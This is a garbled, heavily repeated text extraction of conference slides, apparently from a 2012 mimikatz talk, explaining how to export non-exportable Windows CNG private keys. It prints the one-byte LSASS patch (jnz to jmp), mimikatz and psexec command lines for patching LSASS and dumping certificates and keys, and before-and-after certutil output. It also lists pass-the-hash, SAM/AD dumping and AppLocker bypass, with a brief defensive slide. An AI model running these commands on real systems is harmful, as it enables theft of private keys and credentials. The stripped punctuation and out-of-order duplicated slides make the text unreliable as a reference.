Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
